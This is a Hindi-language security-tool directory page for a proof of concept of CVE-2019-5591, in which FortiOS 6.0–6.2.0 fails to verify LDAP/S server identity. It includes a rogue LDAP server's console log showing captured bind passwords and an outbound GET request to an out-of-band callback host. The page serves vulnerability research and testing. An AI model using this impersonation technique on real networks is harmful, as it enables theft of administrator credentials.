Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
fortios-ldap-mitm-poc-CVE-2019-5591 — FortiOS v6.0.x से v6.2.0 पर LDAP की डिफ़ॉल्ट कॉन्फ़िगरेशन LDAP/S के लिए सर्वर की पहचान की जाँच नहीं करती है, जिससे MITM हमले हो सकते हैं। यह PoC स्थानीय सबनेट पर एक ऐसे LDAP सर्वर को भेजे गए क्रेडेंशियल्स के पूर्ण एक्सफिल्ट्रेशन को प्रदर्शित करता है, जिसे आसानी से प्रतिरूपित किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/ayewo/fortios-ldap-mitm-poc-cve-2019-5591
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubayewo/fortios-ldap-mitm-poc-cve-2019-5591

fortios-ldap-mitm-poc-CVE-2019-5591

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

FortiOS v6.0.x से v6.2.0 पर LDAP की डिफ़ॉल्ट कॉन्फ़िगरेशन LDAP/S के लिए सर्वर की पहचान की जाँच नहीं करती है, जिससे MITM हमले हो सकते हैं। यह PoC स्थानीय सबनेट पर एक ऐसे LDAP सर्वर को भेजे गए क्रेडेंशियल्स के पूर्ण एक्सफिल्ट्रेशन को प्रदर्शित करता है, जिसे आसानी से प्रतिरूपित किया जा सकता है।

110 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2019-5591

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) एक MITM (Man-In-The-Middle) हमले को प्रदर्शित करता है: FortiOS के कमजोर संस्करण को चलाने वाले FortiGate डिवाइस के स्थानीय सबनेट पर एक LDAP सर्वर का प्रतिरूपण (impersonation)।

प्रभावित संस्करण

ये संस्करण कमजोर हैं:

संस्करणप्रभावितसमाधान
FortiOS 7.0प्रभावित नहींलागू नहीं
FortiOS 6.06.0.3 से 6.2.0 तक6.2.1 या उससे ऊपर अपग्रेड करें

कार्रवाई में पहचान

PoC के लिए VMware Fusion के अंदर चल रहे FortiOS 6.2.0 का उपयोग किया गया।

root@kitploit:~

[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
nLBkcjDTHC01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro

🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789

============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================

विवरण

FortiOS v6.0.x से v6.2.0 तक LDAP की डिफ़ॉल्ट कॉन्फ़िगरेशन LDAP/S के लिए सर्वर पहचान की जाँच नहीं करती, जिससे MITM हमले होते हैं। यह PoC स्थानीय सबनेट पर एक आसानी से प्रतिरूपित किए जाने वाले LDAP सर्वर को भेजे गए क्रेडेंशियल्स के पूर्ण बहिर्निष्कासन (exfiltration) को प्रदर्शित करता है।

टूल डाउनलोड करें